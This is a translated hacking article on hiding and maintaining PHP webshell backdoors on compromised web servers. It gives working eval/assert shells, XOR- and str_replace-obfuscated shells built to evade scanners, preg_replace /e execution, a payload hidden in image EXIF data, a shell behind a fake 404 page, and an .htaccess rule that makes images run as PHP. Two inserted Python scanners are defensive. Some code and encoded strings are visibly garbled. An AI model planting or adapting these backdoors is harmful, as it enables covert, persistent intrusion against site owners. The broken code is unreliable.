PHP backdoor hiding and maintenance skills

Source: Internet
Author: User


0x00 Preface

After a successful penetration test we usually want to keep access for longer, so leaving a backdoor is crucial. Backdoor placement generally includes, but is not limited to, database privileges, web privileges, system user accounts and so on. This article describes some ideas for hiding backdoors from public view.

    The most basic one-liners:

        <?php @eval($_POST['cmd']);?>

    or

        <?php @assert($_POST['cmd']);?>

    Of course, these differ only in the function called. For functions disabled in PHP, check disable_functions in php.ini.

    However, ops staff also have many ways to spot our shell at a glance, such as:

    ◆ An anomaly found while comparing file backups by file name, modification time or size

    ◆ Webshell scanning scripts such as Scanbackdoor.php, Pecker, shelldetect.php and various other scanners

    ◆ Searching access.log for the backdoor

    ◆ Or a test request gets blocked by a WAF, leaving a warning log, and so on

    Against these common detection methods, the following seven common approaches to hiding a shell are summarized.

    0x01 Avoidance

    Look at the code of any backdoor scanner and you will see that leaving a well-known keyword in a shell is out of the question.

    Common keywords include:

    ◆ System command execution: system, passthru, shell_exec, exec, popen, proc_open

    ◆ Code execution: eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

    ◆ File inclusion and file access: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

    In the past some people cleverly used $_POST[0]($_POST[1]) to execute commands. Unfortunately that still rarely escapes the scanner's eye, but the ways of constructing it are endless.

    Tudouya published [a construction technique](http://www.freebuf.com/articles/web/33824.html) on FreeBuf:

        <?php
        @$_++;                   // $_ = 1
        $__ = ("#" ^ "|");       // $__ = _
        $__ .= ("." ^ "~");      // _P
        $__ .= ("/" ^ "'");      // _PO
        $__ .= ("|" ^ "/");      // _POS
        $__ .= ("{" ^ "/");      // _POST
        ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
        ?>

    Written out like this the construction is of course too obvious, so it can be compressed into a single line:

        <?php @$_++; $__=("#"^"|").("."^"~").("/"^"'").("|"^"/").("{"^__}[!$_](${__}[$_]);?>

    Then pad it with some ordinary-looking code as disguise, and a simple scanner-evading shell sample emerges.

    It executes commands correctly and bypasses common scanners. It can also be used to write out a new temporary shell.

    0x02 Syntax features

    Using syntax features to execute commands is another interesting method. When PHP processes a double-quoted string it checks whether the string contains variables and parses (evaluates) their values.

    For example:

        ${@eval(phpinfo())}

    {} lets the expression inside the double-quoted string be parsed; @ suppresses the error so execution continues.

    With that we can set about constructing a hidden backdoor. Here we want execution to be triggered through a function, and that function is preg_replace:

        <?php @preg_replace("//e", $_POST['cmd'], "");?>

    This form has long been blacklisted by scanners, but a small modification is enough:

        <?php
        function funfunc($str) {}
        echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
        ?>

    It executes and is not detected.

    The execution mechanism is obvious: after the regex matches, the captured {${phpinfo()}} is passed into funfunc, and because of the /e modifier the replacement is evaluated as PHP, which triggers code execution:

        funfunc("{${phpinfo()}}")

    Another method:

        <?php @assert("\$arr = \"".$_GET['cmd']."\";");?>

    0x03 Inclusion

    File inclusion is a method everyone has used, but there are tricks to it as well.

    A common pattern is an include that pulls in a .txt or .jpg file, or even includes through an existing vulnerability. But the scanner spots these easily, and the more include statements there are, the easier they are to find.

    Look at this script:

        <?php
        if (@isset($_GET[content]))
        {
            $fp = fopen('readme', 'w');
            file_put_contents('readme', "<?php \r\n");
            @file_put_contents('readme', $_GET[content], FILE_APPEND);
            fclose($fp);
            require 'readme';
        }
        ?>

    This solves one problem: the required shell can be generated on demand and then included.

    Unfortunately file_put_contents and similar functions are far too sensitive and are easily scanned out.

    Another generation method creates the shell file whenever the page is accessed:

        <?php @fputs(fopen(base64_decode('cgx1z2lux20ucghw'), w), base64_decode('samples/Pg = '));
        ?>

    This avoids some scanners, but the pattern is still quite eye-catching, and the newly generated file must itself be hidden well enough to escape detection and removal.

    Of course, we are not even considering newer concepts such as heuristic detection here.

    This clearly does not meet the attacker's needs. Hence the following:

        <?php $exif = exif_read_data('./lol.jpg'); preg_replace($exif['make'], $exif['model'], '');?>

    Reference: a backdoor hidden in a JPG image's EXIF data

    This time there is no need for a simple copy /b to build an image trojan; reading a specific marker field of the file and executing it through preg_replace works just as well.

    The following error may appear: Call to undefined function exif_read_data()

    In that case modify php.ini to enable extension=php_exif.dll

    and change the loading order so that it comes after extension=php_mbstring.dll.

    As you can see, this image backdoor uses the preg_replace /e modifier, relies on PHP variable parsing and execution, uses base64 encoding, and finally relies on the file's marker fields to splice together a complete shell. A small reminder for readers hiding backdoors.

    Of course, as long as there is an include point, the forms a included file can take are diverse, even the error_log (though that deserves a second thought); the only limit is imagination.

    0x04 Hiding

    To prevent visitors from noticing that a backdoor exists, even a sharp security researcher can be misled.

        <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">
        <html>
        <head>
        <title>404 Not Found</title>
        </head>
        <body>
        <h1>Not Found</h1>
        <p>The requested URL was not found on this server.</p>
        </body>
        </html>
        <?php
        @preg_replace("/[checksql]/e", $_POST['cmd'], "saft");
        ?>

    With the HTML above rendered, browsing the page already shows a fake 404 that misleads the eye.

    That does not hide it from log analysis, though. To blend better into a large volume of logs, construct the following script:

        <?php
        header('HTTP/1.1 404');
        ob_start();
        @fputs(fopen(base64_decode('cgx1z2lux20ucghw'), w), base64_decode('samples/Pg = '));
        ob_end_clean();
        ?>

    The access really returns a 404, and the log shows the same.

    Yet the script to connect to has been generated in the current directory.

    0x05 Obfuscation

    Readers who have used the weevely tool will know it generates scanner-evading shells like this:

        <?php
        $penh = "bytes = ";
        $kthe = "success ";
        $ftdf = str_replace("w", "", "stwrw_wrwepwlwawcwe");   // str_replace
        $wmmi = "Hangzhou ";
        $zrmt = "Hangzhou ";
        $smgv = $ftdf("f", "", "bfafsfef6f4_fdfefcodfe");       // base64_decode
        $jgfi = $ftdf("l", "", "lclrlelaltel_functlilon");      // create_function
        $rdwm = $jgfi('', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.$penh))); $rdwm();
        ?>

    Below is what the connection looks like in the terminal.

    PS: I forgot to change the terminal encoding :(

    The evasion works by generating randomly named variables in a fixed region, then using str_replace to splice base64_decode back together and execute the command.

    This is concealment at the code level, meant to slip past the scanner.
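    As an added defensive example (not code from the original article or from any tool it names), the following Python scanner looks for the constructions sections 0x01 to 0x05 describe: XOR-assembled names, variable-variable calls, the preg_replace /e modifier, ${@...} interpolation, str_replace-assembled function names, EXIF fields fed to preg_replace and the fake-404 wrapper. The sample files are constructed for the demonstration.

```python
import re

# Constructed PHP snippets (not from any real host) modelled on the obfuscations this
# article walks through, plus one benign control file.
SAMPLES = {
    "xor_build.php": '<?php @$_++; $__=("#"^"|"); $__.=("."^"~"); ${$__}[!$_](${$__}[$_]); ?>',
    "preg_e.php": '<?php echo preg_replace("/<title>(.+?)<\\/title>/ies", \'f("\\1")\', $_POST["cmd"]); ?>',
    "weevely_like.php": '<?php $f = str_replace("w", "", "stwrw_wrwepwlwawcwe"); $g = $f("f", "", "bfafsfef6f4_fdfefcodfe"); ?>',
    "exif.php": "<?php $exif = exif_read_data('./lol.jpg'); preg_replace($exif['make'], $exif['model'], ''); ?>",
    "fake404.php": "<?php header('HTTP/1.1 404'); ob_start(); @fputs(fopen('x.php', 'w'), $_POST['c']); ob_end_clean(); ?>",
    "index.php": '<?php echo "<title>Hello</title>"; ?>',
}

def xor_literals(src):
    """Evaluate every "a" ^ "b" pair of one-character literals and return the text they spell."""
    return "".join(chr(ord(a) ^ ord(b)) for a, b in re.findall(r'"(.)"\s*\^\s*"(.)"', src))

def str_replace_literals(src):
    """Resolve str_replace("x", "", "...")-style calls, direct or via a variable, to the names they yield."""
    return [hay.replace(needle, "") for needle, hay in
            re.findall(r'\(\s*"(\w)"\s*,\s*""\s*,\s*"([^"]+)"\s*\)', src)]

def scan(src):
    """Return human-readable findings for one PHP source file (empty list when nothing matches)."""
    findings = []
    m = re.search(r'preg_replace\s*\(\s*(["\'])/.*?/([a-zA-Z]*)\1', src)
    if m and "e" in m.group(2):
        findings.append("preg_replace pattern carries the /e modifier (replacement runs as PHP)")
    if "exif_read_data" in src and re.search(r'preg_replace\s*\(\s*\$\w+\s*\[', src):
        findings.append("EXIF fields fed straight into preg_replace (image-hosted payload)")
    built = xor_literals(src)
    if built:
        findings.append(f"name assembled from XORed literals: {built!r}")
    if re.search(r'\$\{\s*\$\w+\s*\}\s*\[[^\]]*\]\s*\(', src):
        findings.append("variable-variable array element invoked as a function")
    for name in str_replace_literals(src):
        findings.append(f"function name assembled with str_replace: {name!r}")
    if re.search(r'\$\{\s*@', src):
        findings.append("${@...} expression interpolated inside a double-quoted string")
    if re.search(r"header\s*\(\s*['\"]HTTP/1\.[01] 404", src) and re.search(r'\bob_start\s*\(', src):
        findings.append("hand-written 404 response with output buffering around the real work")
    return findings

def scan_all(files):
    """Map each file name to its findings."""
    return {name: scan(src) for name, src in files.items()}

if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        print(name, "->", hits or "clean")
```

    These rules are keyword and shape checks of exactly the kind the article says scanners rely on; they enumerate the specific constructions shown here and are a starting point for a detection ruleset, not a complete detector.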

    More common methods of visual concealment:

    ◆ Adjusting the file modification time

    ◆ Naming the file to match the upload folder's contents, so that it does not stand out as an anomaly

    ◆ Disguising the file size (at least so it looks like a normal script)

    ◆ Choosing the hiding path carefully and keeping accesses to a minimum

    ◆ Malformed directory names (%20)

    Space directories are relatively easy to find.

    0x06 Parsing

    Use .htaccess to add a parsing backdoor.

    For example:

        AddType application/x-httpd-php .jpg

    Take weevely as an example.
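    As an added example (not from the article), a Python check for the 0x06 technique: it parses .htaccess content and reports any non-.php extension or FilesMatch pattern routed to a PHP handler. The .htaccess text and the handler-name list are constructed for the demonstration.

```python
import re

# Constructed .htaccess text (not from any real host) mixing ordinary directives with
# the handler overrides this article describes.
HTACCESS = """\
RewriteEngine On
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .png .gif
AddType image/gif .gif
<FilesMatch "\\.txt$">
    SetHandler application/x-httpd-php
</FilesMatch>
"""

# Handler names Apache commonly uses to hand a request to PHP (mod_php, php-fpm via proxy).
PHP_HANDLER = re.compile(r"x-httpd-php|php\d*-script|proxy:(fcgi|unix)", re.I)

def php_handler_overrides(text):
    """Return (directive, target) pairs where a non-.php target is routed to a PHP handler."""
    hits, in_match = [], None
    for raw in text.splitlines():
        line = raw.strip()
        fm = re.match(r'<FilesMatch\s+"([^"]+)"', line, re.I)
        if fm:
            in_match = fm.group(1)
        elif line.lower().startswith("</filesmatch"):
            in_match = None
        m = re.match(r"(AddType|AddHandler)\s+(\S+)\s+(.*)", line, re.I)
        if m and PHP_HANDLER.search(m.group(2)):
            hits += [(m.group(1), ext) for ext in m.group(3).split() if not ext.lower().startswith(".php")]
        m = re.match(r"SetHandler\s+(\S+)", line, re.I)
        if m and PHP_HANDLER.search(m.group(1)) and in_match and "php" not in in_match.lower():
            hits.append(("SetHandler", in_match))
    return hits

if __name__ == "__main__":
    for directive, target in php_handler_overrides(HTACCESS):
        print(f"{directive} routes {target} to PHP")
```

    Setting AllowOverride None (or at least excluding FileInfo) in the main server configuration stops .htaccess from changing handlers at all, which removes this technique outright.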

    0x07 Mixing

    To sum up, most of the methods above are just a process of constructing vulnerabilities. Code built around a vulnerability can be surprising, and so can a backdoor: you can write refined and elegant statements, or simple and crude ones; each is just suited to a different scenario. If you can combine these ideas well, constructing your own hidden shell is not difficult. The above is only a summary of experience; you may have interesting ideas of your own, and I hope you will share them.
